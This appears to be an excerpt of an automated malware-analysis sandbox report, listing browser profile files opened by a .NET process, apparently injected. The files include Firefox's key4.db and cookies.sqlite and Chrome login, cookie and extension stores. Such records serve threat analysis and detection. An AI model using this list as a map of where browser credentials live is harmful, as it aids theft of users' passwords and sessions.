Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\data.safe.bin	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\1864fd66-67cd-4e70-8503-03455dd087ef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir\the-real-index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\global-entities_prefixes_filter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\SiteSecurityServiceState.txt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\e55a0594-28e6-48b8-887a-84c346ad1268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\8e0ea440-692c-4546-bda1-eee741f68cac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\d1a7a52e-e3c7-4e69-93b1-055dbe542ec9	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Network Persistent State	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_3	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\xulstore.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_3	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\background-update	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd\VERSION.txt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\975fa64d-84a3-45a6-931b-6d9e916c1153	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\handlers.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5\model.tflite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\3026813b-3a35-4f80-9cae-dbfc31ca1561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\pkcs11.txt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971736.1d0a55ec-8147-406f-a800-14c2abac24f9.event.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\shield-preference-experiments.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\permissions.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\protections.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_3	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966547.008ede48-c825-4f89-a2a2-325df2c42c07.first-shutdown.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\68582a3e-63c9-4674-9a87-c796e9492d98	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\cda89272-a9f9-47ec-8bfb-229c7c5839c5	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png	Jump to behavior
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\11b61c58-6867-4a5f-9aad-2f9d3c403f14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Trust Tokens-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966540.1912e5a9-a49a-44a5-95c6-6e047a7410c8.new-profile.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\008ede48-c825-4f89-a2a2-325df2c42c07	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b79425d0-2f84-41d2-84d3-9f598259534d\model.tflite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd\override_list.pb.gz	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966546.1036486f-a56a-437b-b1e7-a2f1fa5fb914.main.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5\model-info.pb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\a2d29e6c-ac08-481c-a5a2-3b45379df53a	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1912e5a9-a49a-44a5-95c6-6e047a7410c8	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1d0a55ec-8147-406f-a800-14c2abac24f9	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal	Jump to behavior
